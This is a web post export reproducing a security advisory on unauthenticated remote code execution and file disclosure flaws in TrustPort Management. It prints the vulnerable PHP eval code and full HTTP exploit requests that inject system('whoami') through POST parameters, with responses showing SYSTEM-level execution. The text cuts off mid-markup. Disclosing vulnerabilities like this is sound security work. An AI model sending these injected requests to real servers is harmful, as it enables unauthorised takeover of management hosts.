{"id":12134,"date":"2018-04-25T14:19:11","date_gmt":"2018-04-25T22:19:11","guid":{"rendered":"http:\/\/www.palada.net\/index.php\/2018\/04\/25\/news-5903\/"},"modified":"2018-04-25T14:19:11","modified_gmt":"2018-04-25T22:19:11","slug":"news-5903","status":"publish","type":"post","link":"http:\/\/www.palada.net\/index.php\/2018\/04\/25\/news-5903\/","title":{"rendered":"SSD Advisory &#8211; TrustPort Management Unauthenticated Remote Code Execution"},"content":{"rendered":"<p><strong>Credit to Author: SSD \/ Noam Rathaus| Date: Wed, 25 Apr 2018 08:36:14 +0000<\/strong><\/p>\n<div class=\"entry-content\">\n<div class=\"pf-content\">\n<p><strong>Vulnerability Summary<\/strong><br \/> Multiple vulnerabilities in TrustPort&#8217;s management product allow remote unauthenticated attackers to cause the product to execute arbitrary code.<\/p>\n<p>TrustPort Management &#8220;offers you an effective and practical way to install centrally, configure and update antivirus software in your network and it enables mass administration of TrustPort products. 
Central administration from TrustPort brings you simple application of corporate security policies, monitoring of security incidents or the remote starting of tasks&#8221;.<\/p>\n<p><strong>Vendor Response<\/strong><br \/> The vulnerability was reported to the vendor on March 6th; the following response was received on the 6th of March:<br \/> &#8220;thanks for information. We are going to correct the errors in following version of the SW.&#8221;<\/p>\n<p>No further response was received, though we sent 3 more emails to the company between March 6th and the date of publication. We do not know of a way to resolve this bug; the only workaround is to not expose the administrative port to untrusted networks.<\/p>\n<p><strong>Credit<\/strong><br \/> An independent security researcher, Ahmed Y. Elmogy, has reported this vulnerability to Beyond Security\u2019s SecuriTeam Secure Disclosure program.<br \/> <span id=\"more-3685\"><\/span><br \/> <strong>Vulnerability Details<\/strong><br \/> <em>1. 
Pre-auth remote code execution vulnerability (as SYSTEM) in https:\/\/host:20394\/get\/settings-set-user.php.<\/em><\/p>\n<p>Requirements: No authentication is required to exploit this vulnerability.<\/p>\n<p>Vulnerable lines 25 to 29:<\/p>\n<div id=\"crayon-5ae0fedea1ca7846944987\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\">foreach($_POST AS $key=&gt;$val) {\n  # Fill the object with the values we received from POST\n  $evalcode .= '$data-&gt;users-&gt;user-&gt;'.$key.'-&gt;data = \\''.$val.'\\';';\n}\n@eval($evalcode);<\/textarea><\/div>\n<\/div>\n<p>No validation is performed on user input before it is passed to eval.<\/p>\n<p>Exploitation request:<\/p>\n<div id=\"crayon-5ae0fedea1caf058581666\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\">POST \/get\/settings-set-users.php HTTP\/1.1\nHost: VULNERABLE_HOST:20394\nConnection: close\nContent-Length: 177\nOrigin: https:\/\/VULNERABLE_HOST:20394\nX-Requested-With: XMLHttpRequest\nUser-Agent: Mozilla\nContent-Type: application\/x-www-form-urlencoded; charset=UTF-8\nAccept: *\/*\nReferer: https:\/\/VULNERABLE_HOST:20394\/\nAccept-Encoding: gzip, deflate\nAccept-Language: en-US,en;q=0.8\n\naction=update&amp;id=&amp;enabled=on&amp;login=admin';system('whoami');\/\/&amp;loginpass=&amp;loginpass2=&amp;firstname=built-in&amp;surname=administrator&amp;email=&amp;lang=ENU<\/textarea><\/div>\n<\/div>\n<p>Response:<\/p>\n<div id=\"crayon-5ae0fedea1cb3517834940\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\">nt authority\\system\n({\"success\":\"false\",\n        \"vipperResult\":\"-2700\",\n        \"resultDesc\":\"ER_TPM_AUTHENTICATION_FAILED\"\n      })<\/textarea><\/div>\n<\/div>\n<p><em>2. 
Pre-auth remote code execution vulnerability (as SYSTEM) in https:\/\/host:20394\/get\/settings-set-user-perms.php<\/em><\/p>\n<p>Requirements: No authentication is required to exploit this vulnerability.<\/p>\n<p>Vulnerable lines 16 to 25:<\/p>\n<div id=\"crayon-5ae0fedea1cb5385943372\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\">$evalcode = '';\nforeach($_POST AS $key=&gt;$val) {\n  if (preg_match('\/hide|perms|\/',$key)) {\n    $key = str_replace('|','-&gt;',preg_replace('\/hide|perms|\/','',$key));\n    $evalcode .= '$permdata-&gt;userpolicies-&gt;permissions-&gt;'.$key.'-&gt;data = \\''.$val.'\\';';\n  }\n  $evalcode .= '$permdata-&gt;userpolicies-&gt;permissions-&gt;attr[\\'rights\\'] = \\''.$_POST['rights'].'\\';';\n  $evalcode .= '$permdata-&gt;userpolicies-&gt;permissions-&gt;attr[\\'id\\'] = \\''.$_POST['id'].'\\';';\n}\n@eval($evalcode);<\/textarea><\/div>\n<\/div>\n<p>No validation is performed on user input before it is passed to eval.<\/p>\n<p>Exploitation request:<\/p>\n<div id=\"crayon-5ae0fedea1cb8023224738\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly 
style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> POST \/get\/settings-set-user-perms.php HTTP\/1.1  Host: VULNERABLE_HOST:20394  Connection: close  Content-Length: 41  Origin: https:\/\/VULNERABLE_HOST:20394  X-Requested-With: XMLHttpRequest  User-Agent: Mozilla  Content-Type: application\/x-www-form-urlencoded; charset=UTF-8  Accept: *\/*  Referer: https:\/\/VULNERABLE_HOST:20394\/  Accept-Encoding: gzip, deflate  Accept-Language: en-US,en;q=0.8    id=test&#8217;;system(&#8216;whoami&#8217;);\/\/&amp;rights=admin<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-5ae0fedea1cb8023224738-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5ae0fedea1cb8023224738-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5ae0fedea1cb8023224738-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5ae0fedea1cb8023224738-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5ae0fedea1cb8023224738-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5ae0fedea1cb8023224738-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5ae0fedea1cb8023224738-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5ae0fedea1cb8023224738-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5ae0fedea1cb8023224738-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5ae0fedea1cb8023224738-10\">10<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5ae0fedea1cb8023224738-11\">11<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5ae0fedea1cb8023224738-12\">12<\/div>\n<div 
class=\"crayon-num\" data-line=\"crayon-5ae0fedea1cb8023224738-13\">13<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5ae0fedea1cb8023224738-14\">14<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-5ae0fedea1cb8023224738-1\"><span class=\"crayon-v\">POST<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">get<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">settings<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">set<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">user<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">perms<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">php <\/span><span class=\"crayon-v\">HTTP<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">1.1<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5ae0fedea1cb8023224738-2\"><span class=\"crayon-v\">Host<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">VULNERABLE_HOST<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">20394<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5ae0fedea1cb8023224738-3\"><span class=\"crayon-v\">Connection<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">close<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5ae0fedea1cb8023224738-4\"><span class=\"crayon-v\">Content<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Length<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">41<\/span><\/div>\n<div class=\"crayon-line\" 
id=\"crayon-5ae0fedea1cb8023224738-5\"><span class=\"crayon-v\">Origin<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">https<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-c\">\/\/VULNERABLE_HOST:20394<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5ae0fedea1cb8023224738-6\"><span class=\"crayon-v\">X<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Requested<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">With<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">XMLHttpRequest<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5ae0fedea1cb8023224738-7\"><span class=\"crayon-v\">User<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Agent<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">Mozilla<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5ae0fedea1cb8023224738-8\"><span class=\"crayon-v\">Content<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Type<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">application<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">x<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">www<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">form<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">urlencoded<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">charset<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">UTF<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-cn\">8<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5ae0fedea1cb8023224738-9\"><span class=\"crayon-v\">Accept<\/span><span 
class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-o\">*<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5ae0fedea1cb8023224738-10\"><span class=\"crayon-v\">Referer<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">https<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-c\">\/\/VULNERABLE_HOST:20394\/<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5ae0fedea1cb8023224738-11\"><span class=\"crayon-v\">Accept<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Encoding<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">gzip<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">deflate<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5ae0fedea1cb8023224738-12\"><span class=\"crayon-v\">Accept<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Language<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">en<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">US<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">en<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-v\">q<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">0.8<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5ae0fedea1cb8023224738-13\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5ae0fedea1cb8023224738-14\"><span class=\"crayon-v\">id<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-i\">test<\/span><span class=\"crayon-s\">&#8216;;system(&#8216;<\/span><span class=\"crayon-i\">whoami<\/span>&#8216;<span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><span 
class=\"crayon-c\">\/\/&amp;rights=admin<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0016 seconds] -->  <\/p>\n<p>Response:<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-5ae0fedea1cbb893778491\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 
12px !important; line-height: 15px !important;\"> nt authoritysystem  ({&#8220;success&#8221;:&#8221;false&#8221;,          &#8220;vipperResult&#8221;:&#8221;-2700&#8243;,          &#8220;resultDesc&#8221;:&#8221;ER_TPM_AUTHENTICATION_FAILED&#8221;          })<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-5ae0fedea1cbb893778491-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5ae0fedea1cbb893778491-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5ae0fedea1cbb893778491-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5ae0fedea1cbb893778491-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5ae0fedea1cbb893778491-5\">5<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-5ae0fedea1cbb893778491-1\"><span class=\"crayon-e\">nt<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">authority<\/span><span class=\"crayon-sy\"><\/span><span class=\"crayon-e\">system<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5ae0fedea1cbb893778491-2\"><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">{<\/span><span class=\"crayon-s\">&#8220;success&#8221;<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-s\">&#8220;false&#8221;<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5ae0fedea1cbb893778491-3\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-s\">&#8220;vipperResult&#8221;<\/span><span 
class=\"crayon-o\">:<\/span><span class=\"crayon-s\">&#8220;-2700&#8221;<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5ae0fedea1cbb893778491-4\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-s\">&#8220;resultDesc&#8221;<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-s\">&#8220;ER_TPM_AUTHENTICATION_FAILED&#8221;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5ae0fedea1cbb893778491-5\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">}<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0004 seconds] -->  <\/p>\n<p><em>3. Pre-auth remote arbitrary file disclosure\/deletion in https:\/\/host:20394\/get\/manage-get-stations-add.php<\/em><br \/> Requirements: No authentication is required to exploit this vulnerability, requires combination with another minor vulnerability to be exploitable.<\/p>\n<p>Restrictions: The file disclosed will be deleted after that, unless the &#8220;exploiter&#8221; manages somehow to race the PHP code before that happens (I doubt).<\/p>\n<p>Vulnerable code, line 74 to 76:<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-5ae0fedea1cbe866845756\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px 
!important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\">   case &#8220;download&#8221;:    \texport_download_file($_GET[&#8216;key&#8217;]);    \tbreak;<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-5ae0fedea1cbe866845756-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5ae0fedea1cbe866845756-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5ae0fedea1cbe866845756-3\">3<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; 
tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-5ae0fedea1cbe866845756-1\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-st\">case<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;download&#8221;<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5ae0fedea1cbe866845756-2\"><span class=\"crayon-h\">&nbsp;&nbsp;\t<\/span><span class=\"crayon-e\">export_download_file<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">_GET<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-s\">&#8216;key&#8217;<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5ae0fedea1cbe866845756-3\"><span class=\"crayon-h\">&nbsp;&nbsp;\t<\/span><span class=\"crayon-st\">break<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0004 seconds] -->  <\/p>\n<p>Where export_download_file is:<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-5ae0fedea1cc0266046815\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div 
class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> function export_download_file($filename) {    $path = ini_get(&#8216;upload_tmp_dir&#8217;).&#8217;\\&#8217;.$filename;    $filename = file_get_contents($path);    ob_end_clean();    header(&#8216;Content-type: application\/download&#8217;);    header(&#8216;Content-Disposition: attachment; filename=&#8221;export.csv&#8221;&#8216;);    header(&#8216;Content-transfer-encoding: binary&#8217;);    header(&#8216;Content-Length: &#8216;.filesize($filename));    readfile($filename);    unlink($path);    unlink($filename);  }<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-5ae0fedea1cc0266046815-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" 
data-line=\"crayon-5ae0fedea1cc0266046815-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5ae0fedea1cc0266046815-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5ae0fedea1cc0266046815-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5ae0fedea1cc0266046815-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5ae0fedea1cc0266046815-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5ae0fedea1cc0266046815-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5ae0fedea1cc0266046815-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5ae0fedea1cc0266046815-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5ae0fedea1cc0266046815-10\">10<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5ae0fedea1cc0266046815-11\">11<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5ae0fedea1cc0266046815-12\">12<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-5ae0fedea1cc0266046815-1\"><span class=\"crayon-t\">function<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">export_download_file<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">filename<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5ae0fedea1cc0266046815-2\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">path<\/span><span class=\"crayon-h\"> <\/span><span 